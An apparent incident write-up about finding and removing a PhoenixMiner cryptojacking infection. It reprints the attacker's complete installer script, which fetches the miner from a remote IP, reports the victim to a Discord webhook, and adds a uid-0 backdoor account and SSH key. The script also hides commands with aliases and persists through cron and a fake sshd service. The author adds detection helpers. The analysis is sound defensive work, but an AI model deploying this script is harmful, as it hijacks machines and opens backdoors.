Notes on a cryptominer intrusion and its cleanup


To make remote access convenient, a junior labmate exposed the lab computer to the public internet through a port mapping; the result was that a cryptomining program got planted on it.

The mining software was PhoenixMiner, launched by the scripts listed below. It had already been cleaned off by the time of writing, so it cannot be shown running here; while it was active, the nvidia-smi command showed the miner process at work on the GPU.

Next, go into the process's /proc entry, cd /proc/$PID, and look at its information.

First, listing everything in that directory (the exe and cwd symlinks in particular) shows where the miner had been placed.

cat status shows the process's status information.

The PPid field there identifies the parent process. Here I was reproducing the incident, so the parent is 4168; in the original case the parent was 2.

Then I killed the parent process and the miner process. But after a while the miner appeared again, so I suspected a scheduled task was relaunching it; rebooting did not help either.

First, check whether the boot-time autostart script is untouched:

vim /etc/rc.local

This file was normal, so the persistence was not placed here.

Next, check the root account's .bashrc:

vim ~/.bashrc

It contains only these few lines, and they clearly mask the delete command. After switching to the root account I found that many other commands had been masked as well, so something was definitely wrong, but this file by itself does not run the miner. Thinking of scheduled tasks, I checked whether a crontab had been set up:

ps -aux | grep crontab

Sure enough, there was a scheduled task; next, look at the scheduled tasks themselves:

crontab -e

You can see these few odd entries; I have commented them out here.

Then go to /var/tmp/.tmp/ and look at the files there. The first, .b4nd1d0, is a small launcher that starts PhoenixMiner if it is not already running:

#!/bin/bash
m1lbe1()
{
if ! pgrep -x PhoenixMiner >/dev/null
then
        cd /var/tmp/.tmp/PhoenixMiner
        ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
        exit;
fi
}
m1lbe1
The second file, .placi, is the installer that the cron entries keep re-running (reproduced as captured):
#!/bin/bash
###Date###
user="sclipicibosu"
pass="saieilamuie"
gilimea='"'
ip=`/usr/bin/curl -s -connect-timeout 4 -m 4 ifconfig.me`
rm -rf *timeout
sshkey="ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAplmD9EFVf28OUB8tK/qJYG4ggMAw9PJzJU1AONgB5FV9w1hxxmP/+vVUfj7HgaTPB94IW4svaMe3vMTkmYm/0y9Zrh8Q2r6f/r1OqpwQU3ThLR6quOAtl7TW7y4VIQ/wxXOffINAIrEv7mi8D0XgpkiFwIUoblZY0ErPjBwy0WFqua2Z0qxx1bHoznDxPOsHMRxSge4DYA0gADttEWz8x1NZFcjMql8OOQ5IpZRsHxlO4cBVG37WyYpL7NYGF0gqnRRFSXBGduQph1dsEf3KFo83/QaSg+mm+EQiFrbVeqpm9tDjiFazbrwsw0YhT47yzKPi+Tews16sIHAvs5KZkw== sclipicibosu"
nenea=`whoami`
uptime=$(</proc/uptime)
uptime=${uptime%%.*}
zile=$(( uptime/60/60/24 ))
secunde=$(( uptime%60 ))
minute=$(( uptime/60%60 ))
ore=$(( uptime/60/60%24 ))
sended=$(date +'%m/%d/%Y')
url='https://discord.com/api/webhooks/821345448212037685/UIO1CteG8cl6DerrO6fbI0ldKGk90H36NeNpXH56aYNbCBd1UZ31J89CR5ZBRSd9c3xj'
##########
getingmineru(){
locatie="$(cat /var/tmp/.ladyg0g0/.pr1nc35)"
if [ -f $locatie/PhoenixMiner ]; then
    :
    else
    curl -s -L -O 45.32.112.68/.mini/PhoenixMiner.tar
    tar xvf PhoenixMiner.tar
    chmod 777 PhoenixMiner/*
fi
}
###
locationperfection(){
tinlex=$(pwd)
    mkdir /var/tmp/.ladyg0g0/ >/dev/null 2>&1
    echo $tinlex > "/var/tmp/.ladyg0g0/.pr1nc35"
    if [ $(id -u) = 0 ]; then
        if [ -f "/usr/bin/.locationesclipiciu" ]; then
            :
        else
            echo $tinlex > "/usr/bin/.locationesclipiciu"
        fi
    fi
}
###
showproof(){
echo '
{
  "content": null,
  "embeds": [
    {
      "title": "Miner ON: Ip: '$ip' | Pe User: '$nenea' ",
      "description": "**Cand s-a facut Install-ul:** ***'$sended'***\n\n**Other Info:** ***Version: 3.0*** **| Uptime Miner:** ***'$zile'*** **Zile**",
      "color": 16711680
    }
  ]
}' > /tmp/.send.json
/usr/bin/curl -H "Content-Type: application/json" --data @/tmp/.send.json $url
}
###
sshkiller(){
if [ $(id -u) = 0 ]; then
mkdir /usr/.SQL-Unix
mkdir /usr/.SQL-Unix/.SQL
echo "# .bashrc
############
rm -rf ~/.bashrc
rm -rf ~/.bash_history
alias pkill='printf $gilimea$gilimea'
alias kill='printf $gilimea$gilimea'
alias killall='printf $gilimea$gilimea'
alias init='printf $gilimea$gilimea'
alias rm='printf $gilimea$gilimea'
alias halt='printf $gilimea$gilimea'
alias adduser='printf $gilimea$gilimea'
alias userdel='printf $gilimea$gilimea'
alias crontab='printf $gilimea$gilimea'
alias htop='printf $gilimea$gilimea'
alias find='printf $gilimea$gilimea'
alias locate='printf $gilimea$gilimea'
alias ps='printf $gilimea$gilimea'
alias ss='printf $gilimea$gilimea'
alias netstat='printf $gilimea$gilimea'
############
echo '# .bashrc
                                                                                                                                                                       source /usr/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
                                                                                                                                                                       echo Uname: $(uname -a)
' > ~/.bashrc
" > /usr/.SQL-Unix/.SQL/.db
echo "# .bashrc
                                                                                                                                                                       source /usr/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
                                                                                                                                                                       echo Uname: $(uname -a)
" > ~/.bashrc
echo "
if [ -f ~/.bashrc ]; then
    . ~/.bashrc
fi

" > ~/.bash_profile
chattr -i /root/.ssh ; chattr -i /root/.ssh/authorized_keys
echo $sshkey > "/root/.ssh/authorized_keys"
chmod 600 /root/.ssh/authorized_keys
chattr +i /root/.ssh/authorized_keys
else
mkdir /var/tmp/.SQL-Unix > /dev/null 2>&1
mkdir /var/tmp/.SQL-Unix/.SQL > /dev/null 2>&1
echo "# .bashrc
############
rm -rf ~/.bashrc
rm -rf ~/.bash_history
alias pkill='printf $gilimea$gilimea'
alias kill='printf $gilimea$gilimea'
alias killall='printf $gilimea$gilimea'
alias init='printf $gilimea$gilimea'
alias rm='printf $gilimea$gilimea'
alias halt='printf $gilimea$gilimea'
alias adduser='printf $gilimea$gilimea'
alias userdel='printf $gilimea$gilimea'
alias crontab='printf $gilimea$gilimea'
alias htop='printf $gilimea$gilimea'
alias find='printf $gilimea$gilimea'
alias locate='printf $gilimea$gilimea'
alias ps='printf $gilimea$gilimea'
alias ss='printf $gilimea$gilimea'
alias netstat='printf $gilimea$gilimea'
############
echo '# .bashrc
                                                                                                                                                                       source /var/tmp/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
                                                                                                                                                                       echo Uname: $(uname -a)
' > ~/.bashrc
" > /var/tmp/.SQL-Unix/.SQL/.db
echo "# .bashrc
                                                                                                                                                                       source /var/tmp/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
                                                                                                                                                                       echo Uname: $(uname -a)
" > ~/.bashrc
echo "
if [ -f ~/.bashrc ]; then
    . ~/.bashrc
fi

" > ~/.bash_profile
fi
}
###
facuser(){
if [ $(id -u) = 0 ]; then
   if ! cat /etc/passwd | grep -q "${user}"; then
   /usr/sbin/useradd -u0 -g0 -o -s /bin/bash $user ; usermod -aG sudo $user
   yes "$pass" | passwd $user
   else
        :
   fi
fi
}
###
minerinio(){
locatie="$(pwd)"
if [ -f $locatie/.b4nd1d0 ]
then
locatie="$(pwd)"
echo '#!/bin/bash
m1lbe1()
{
if ! pgrep -x PhoenixMiner >/dev/null
then
        cd '$locatie'/PhoenixMiner
        ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
        exit;
fi
}
m1lbe1' > $locatie/.b4nd1d0
    chmod 777 $locatie/.b4nd1d0
    $locatie/./.b4nd1d0
    else
    locatie="$(pwd)"
echo '#!/bin/bash
m1lbe1()
{
if ! pgrep -x PhoenixMiner >/dev/null
then
        cd '$locatie'/PhoenixMiner
        ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
        exit;
fi
}
m1lbe1' > $locatie/.b4nd1d0
chmod 777 $locatie/.b4nd1d0
$locatie/./.b4nd1d0
fi
}
###
crontablegend() {  
locatie="$(pwd)"
if ! crontab -l | grep -q '.placi'; then
   rm -rf $locatie/.5p4rk3l5
   echo "@daily "$locatie"/./.b4nd1d0" >> $locatie/.5p4rk3l5
   sleep 1
   echo "@reboot "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
   sleep 1
   echo "* * * * * "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
   sleep 1
   echo "@monthly "$locatie"/./.placi  > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
   sleep 1
   crontab $locatie/.5p4rk3l5
   sleep 1
   source ~/.bashrc
   rm -rf $locatie/.5p4rk3l5
fi
}
###
locationperfection
sleep 0.5
echo "Locatie ON"
wait
getingmineru
sleep 0.5
echo "Minerul Luat"
wait
facuser
sleep 0.5
echo "User Facut"
wait
sshkiller
sleep 0.5
echo "SSH Mort"
wait
showproof
sleep 0.5
echo "Info Trimis"
wait
crontablegend
sleep 0.5
echo "Crontab Done"
wait
minerinio
sleep 0.5
echo "Minerul Pornit"
wait
###
checkingpid(){
    if [ -f /usr/bin/.pidsclip ]; then
        if ps -p $(cat /usr/bin/.pidsclip) > /dev/null; then
            echo "Already running..."
        else 
            /usr/bin/sshd > /dev/null 2>&1 & disown
            echo $! > /usr/bin/.pidsclip
            chmod 777 /usr/bin/.pidsclip
            echo "Done"
        fi
    else
        /usr/bin/sshd > /dev/null 2>&1 & disown
        echo $! > /usr/bin/.pidsclip
        chmod 777 /usr/bin/.pidsclip
        echo "Done"
        fi
}
###
killingstrangers(){
echo '
#!/bin/bash
locatieasdf=$(cat /usr/bin/.locationesclipiciu)
if [ ! -d '$locatieasdf' ]; then
    mkdir '$locatieasdf'
    rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
    sleep 1
    '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
else
    if [ ! -f  '$locatieasdf'/PhoenixMiner ]; then
        rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
        sleep 1
        '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
fi' > /usr/bin/sshd
sleep 1
chmod 777 /usr/bin/sshd
}
###
pisamsystemu(){
echo '[Unit]
Description=Example systemd service.
[Service]
Type=simple
Restart=always
RestartSec=3600
ExecStart=/bin/bash /usr/bin/sshd
[Install]
WantedBy=multi-user.target' > /lib/systemd/system/myservice.service
sleep 1
chmod 644 /lib/systemd/system/myservice.service
systemctl enable myservice
systemctl start myservice

if [ -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
    echo "Locatia este deja setata"
else
    if [ -f "/usr/bin/.locationesclipiciu" ]; then
        locationperfection
        echo "Am-rupt-locatiile-alea"
sleep 1
    fi
fi
if [ ! -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
    if [ -d "/var/tmp/.ladyg0g0" ]; then
        locationperfection
        locationperfection
        echo "Locatia a fost setata"
    else
        echo "Acum facem folderul"
        mkdir /var/tmp/.ladyg0g0/
        locationperfection
        locationperfection
        echo "Am setat locatia"
    fi
fi
if [ -f $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip ]; then
    if ps -p $(cat $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip) > /dev/null; then
        echo "Already running..."
    else 
        $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
        echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
        chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
        echo "Done"
        fi
else
    $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
    echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
    chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
    echo "Done"
fi
}
###
if [ $(id -u) = 0 ]; then
    if [ ! -d /usr/bin/.locationesclipiciu ]; then
    cp -avr $(cat /var/tmp/.ladyg0g0/.pr1nc35) /usr/bin/.locationesclipiciu >/dev/null 2>&1 & disown
    bash -c 'yum install -y rsync >/dev/null 2>&1 & disown' || bash -c 'apt install -y rsync >/dev/null 2>&1 & disown'
        if [ ! -f /usr/bin/sshd ]; then
            killingstrangers
            pisamsystemu
            checkingpid
        fi
    fi
fi
###
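
Killing PhoenixMiner and deleting the cron entries covers only part of what .placi sets up. Reading the script: facuser adds a second uid-0 account (useradd -u0 -g0 -o -s /bin/bash sclipicibosu, then usermod -aG sudo) with a fixed password; sshkiller writes the attacker's key into /root/.ssh/authorized_keys and sets chattr +i on it so the file cannot simply be removed or edited; crontablegend installs @reboot, every-minute, @daily and @monthly entries; when running as root, killingstrangers and pisamsystemu drop a bash script at /usr/bin/sshd and a systemd unit myservice.service (ExecStart=/bin/bash /usr/bin/sshd, Restart=always); and showproof posts the host's IP to a Discord webhook. As an added example, not code from the original post, the helpers below check for those leftovers. They read the files they are given, so they run on copied evidence as well as on the live host; /usr/sbin/sshd as the real daemon's path is an assumption about a typical distro.

```sh
#!/bin/sh
# Added example, not code from the original post: look for the persistence the
# .placi installer sets up besides the miner itself. Each helper reads the file(s)
# it is given, so it works on a live box or on evidence copied off it.
# Usage on a live host (as root, from a shell started with bash --noprofile --norc
# so the installer's aliases are not in effect):
#   extra_uid0_accounts /etc/passwd
#   suspicious_cron_lines /var/spool/cron/crontabs/root   # /var/spool/cron/root on RHEL-style systems
#   suspicious_units /lib/systemd/system/*.service /etc/systemd/system/*.service
#   immutable_files /root/.ssh/authorized_keys

extra_uid0_accounts() {   # extra_uid0_accounts PASSWD_FILE -> uid-0 users other than root (useradd -u0 -g0 -o)
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

suspicious_cron_lines() { # suspicious_cron_lines CRONTAB_FILE -> "reasons<TAB>entry" for entries worth a look
    awk '
        /^[ \t]*(#|$)/ { next }                                # skip comments and blank lines
        {
            hit = ""
            if ($0 ~ /\/var\/tmp\/|\/tmp\/|\/dev\/shm\//) hit = hit "tmp-path "     # runs out of a tmp dir
            if ($0 ~ /\/\.[A-Za-z0-9_-]/)                  hit = hit "hidden-path "  # a dot-file or dot-dir
            if ($0 ~ /^@reboot/)                           hit = hit "reboot "       # re-armed at every boot
            if (hit != "") print hit "\t" $0
        }
    ' "$1"
}

suspicious_units() {      # suspicious_units UNIT_FILE... -> ExecStart lines that run a shell on a script,
                          # or something called sshd that is not /usr/sbin/sshd (assumed real path)
    for u in "$@"; do
        awk -v unit="$u" '
            /^ExecStart=/ {
                cmd = substr($0, 11)                           # strip "ExecStart="
                sub(/^[-@:+!]+/, "", cmd)                      # drop systemd exec prefixes
                if (cmd ~ /^\/bin\/(ba|da)?sh[ \t]/ || (cmd ~ /sshd/ && cmd !~ /^\/usr\/sbin\/sshd/))
                    print unit "\t" cmd
            }' "$u"
    done
}

immutable_files() {       # immutable_files FILE... -> files carrying chattr +i (Linux only; needs lsattr)
    command -v lsattr >/dev/null 2>&1 || { echo "lsattr not available" >&2; return 2; }
    for f in "$@"; do
        [ -e "$f" ] || continue
        lsattr -d -- "$f" 2>/dev/null | awk -v f="$f" '$1 ~ /i/ { print f }'
    done
}
```

The cron check has to be run over every user's spool file plus /etc/crontab and /etc/cron.d, because crontab -l only shows the calling user's table. An immutable authorized_keys needs chattr -i before it can be replaced, exactly as the installer itself does before writing it.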

Sure enough, this is where the intruder did their work, and the script rewrote .bashrc, which is why looking at it earlier did not directly reveal the problem. In sshkiller the new .bashrc places the line that sources /usr/.SQL-Unix/.SQL/.db (or /var/tmp/.SQL-Unix/.SQL/.db when not running as root) behind a long run of spaces, so it sits off the right edge of the editor window; the sourced file deletes ~/.bash_history, aliases pkill, kill, killall, ps, ss, netstat, crontab, find, locate, rm and several others to printf '', and writes the same .bashrc back, which is why so many commands seemed to be masked. Actually, if the script had backed up .bashrc first and restored it after running, it would have been even stealthier. Probably a beginner (though it still took me a long time to track this thing down...).
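
The sshkiller function above pads its source line with spaces and aliases the investigation commands to printf '', so a quick look at .bashrc shows nothing wrong. As an added example, not code from the original post, the helper below flags those three tells in an rc file (a command pushed off-screen by leading blanks, a source of a file in a hidden or tmp path, an alias of kill/ps/crontab and friends whose value is not the command itself) and then audits every file the rc sources. It only reads the files; nothing is executed. The threshold of 40 leading blanks is an assumption.

```sh
#!/bin/sh
# Added example, not code from the original post: audit shell rc files for the
# three tricks the captured installer uses - a command pushed off-screen by a long
# run of spaces, a `source` of a file in a hidden/tmp path, and aliases that turn
# kill/ps/crontab/etc. into no-ops. Paths are read from the file, nothing is executed.

audit_rc() {        # audit_rc FILE  -> "reason<TAB>line" per finding
    awk '
        # 1. long leading blank run followed by a command: hidden right of the viewport
        {
            if (match($0, /^[ \t]+/) && RLENGTH >= 40 && $0 !~ /^[ \t]*$/)
                print "padded-line\t" $0
        }
        # 2. sourcing a file from a hidden directory or a world-writable tmp dir
        ($1 == "source" || $1 == ".") && $2 ~ /\/\.|^\/(var\/)?tmp\/|^\/dev\/shm\// {
            print "hidden-source\t" $0
        }
        # 3. alias of an investigation/cleanup command whose value is not the command itself
        $1 == "alias" {
            n = $2; sub(/=.*/, "", n)                    # alias name
            v = $0; sub(/^[^=]*=/, "", v)                # alias value
            gsub(/^[\047\042]|[\047\042]$/, "", v)       # strip surrounding quotes
            if (n ~ /^(kill|pkill|killall|ps|ss|netstat|crontab|find|locate|htop|rm|init|halt|adduser|userdel)$/ &&
                v !~ ("^" n "( |$)"))
                print "neutered-alias\t" $0
        }
    ' "$1"
}

audit_rc_chain() {  # audit_rc_chain FILE  -> audit FILE and every readable file it sources
    audit_rc "$1"
    awk '($1 == "source" || $1 == ".") { print $2 }' "$1" |
    while read -r f; do
        if [ -r "$f" ]; then audit_rc "$f"; fi
    done
}

count_findings() {  # count_findings FILE  -> number of findings across the chain
    audit_rc_chain "$1" | wc -l | tr -d ' '
}
```

Run it as audit_rc_chain /root/.bashrc and also over ~/.bash_profile, since the installer rewrites that file too so that .bashrc is pulled into login shells. Because the aliases are already live in any shell that sourced the rc, do the cleanup from bash --noprofile --norc, or prefix each command with command or a backslash (\ps, \kill) so the alias is bypassed.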

With that, the mining malware was cleaned up, and the scare made me turn off the port mapping right away. Some people really will do anything for money.

